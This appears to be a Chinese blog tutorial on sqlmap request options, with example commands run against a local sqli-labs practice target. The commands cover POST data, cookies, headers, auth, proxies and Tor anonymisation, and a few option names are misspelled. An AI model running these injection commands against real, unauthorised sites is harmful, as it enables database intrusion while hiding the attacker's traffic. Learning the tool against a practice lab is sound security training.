注入工具 -- sqlmap(设置请求参数)

简介: 注入工具 -- sqlmap(设置请求参数)


一、抓包


0a2653c851af460fa595bd959398a8f1.png


二、设置提交参数


sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111&passwd=222222222&submit=Submit” --baner

0eacb84100b54626af849e6b562bf92a.png


三、多个参数,指定分隔符


sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111;passwd=222222222;submit=Submit” --param-del=";" --baner


四、带cookie注入


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --cookie “uin=fasdffes; skey=fwefdsd; ptisp=cfasdfas” --banner


五、设置user-agent


–random-agent 随机UA

–user-agent=“Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36”


2d65d23f6d4748949b924e4057485923.png


sqlmap自带的UA


六、设置host


加*或者–level 5


七、设置referer


加*或者–level 5


八、额外的http头


–headers,每个标头用换行符分割,或者直接在sqlmap.conf文件中设置

sqlmap -u “http://192.168.1.121/sqli/less-1/?id=1” --headers=“Host:ww.baidu.com\nUser-agent:Firefco” -v 5


九、设置HTTP协议认证的参数:–auth-type和–auth-cred


–auth-type:Basic/Digest/NTLM

–auth-cred认证语法:username:password

弹出对话框,让输入账号和密码


十、设置http代理


–proxy http(s):ip[:端口] --proxy “http://1.2.3.4:9000

–proxy-cred username:password

–proxy-file 设置多条代理


2e9b90b2ca334476abebe75bafe6eeaa.png


–ignore-proxy 设置忽略系统代理


十一、设置tor隐藏网络


1、安装tor

apt install tor

2、开启服务

service tor start

3、查看状态

service tor status

sqlmap -u “http://192.168.1.121/sqli/less-1/?id=1” --tor --tor-type https --check-tor


十二、设置延迟


–delay 0.5 延迟0.5秒


十三、设置超时


–timeout 5 5秒超时


十四、设置随机化参数


sqlmap -u “http://192.168.1.121/sqli/less 1/?id=1” --randomize id --banner

id会变成任意值


十五、设置重试


–retries 5 重试5次


十六、日志过滤目标


在burpsuite中,保存日志,里面会有很多数据包,但是我们只探测一个

sqlmap -l log.txt --scope=“192.168.1.121”

–skip-urlencode 不进行url加密


十七、设置忽略401


–ignore-401 参数用来忽略未验证错误

禁止非法,后果自负


目录
相关文章
Kali 换源(国内优质镜像源地址)2023最新
Kali 换源(国内优质镜像源地址)2023最新
4880 0
|
6月前
|
SQL Oracle 关系型数据库
【赵渝强老师】Oracle的闪回数据归档
本文介绍了Oracle闪回数据归档(Flashback Data Archive)的功能与实现方法。闪回数据归档可将表中的历史数据进行归档,支持全面的历史数据查询,引入了“Oracle Total Recall”概念。文中通过具体实战步骤演示了如何创建和启用闪回数据归档:包括创建表空间、数据归档,设置默认归档,授予用户权限,开启表的归档功能,并展示了误操作后如何通过归档恢复数据。最后通过执行计划验证了数据来源于归档。
155 4
|
9月前
|
JavaScript NoSQL Java
基于SpringBoot+Vue实现的大学生就业服务平台设计与实现(系统源码+文档+数据库+部署等)
面向大学生毕业选题、开题、任务书、程序设计开发、论文辅导提供一站式服务。主要服务:程序设计开发、代码修改、成品部署、支持定制、论文辅导,助力毕设!
|
11月前
|
安全 网络协议 关系型数据库
最好用的17个渗透测试工具
渗透测试是安全人员为防止恶意黑客利用系统漏洞而进行的操作。本文介绍了17款业内常用的渗透测试工具,涵盖网络发现、无线评估、Web应用测试、SQL注入等多个领域,包括Nmap、Aircrack-ng、Burp Suite、OWASP ZAP等,既有免费开源工具,也有付费专业软件,适用于不同需求的安全专家。
1801 2
|
异构计算
无影云电脑产品使用之购买什么配置可以玩黑神话悟空游戏?
本文汇总了关于阿里云无影云电脑的常见问题及解答,包括所需配置以运行《黑神话:悟空》游戏、不同版本显卡型号、电竞模式库存情况及如何查看云电脑的使用情况等。提供了多个详细解答链接,帮助用户更好地了解和使用无影云电脑。
|
NoSQL Redis
redis学习五、错误总结,redis正常运行时后会出现一些bug 总结。
本文介绍了Redis在正常运行时可能遇到的一个错误,即无法进行磁盘持久化的问题,并提供了通过设置`stop-writes-on-bgsave-error`为`no`来解决这一问题的方案。
385 0
|
存储 安全 Linux
三大抽样分布——卡方分布、t分布、F分布
三大抽样分布——卡方分布、t分布、F分布
|
存储 前端开发 JavaScript
存储型 XSS 攻击演示(附链接)
存储型 XSS 攻击演示(附链接)
|
网络协议 网络虚拟化 数据安全/隐私保护
eNSP基本命令大全
eNSP基本命令大全
727 0
下一篇
oss教程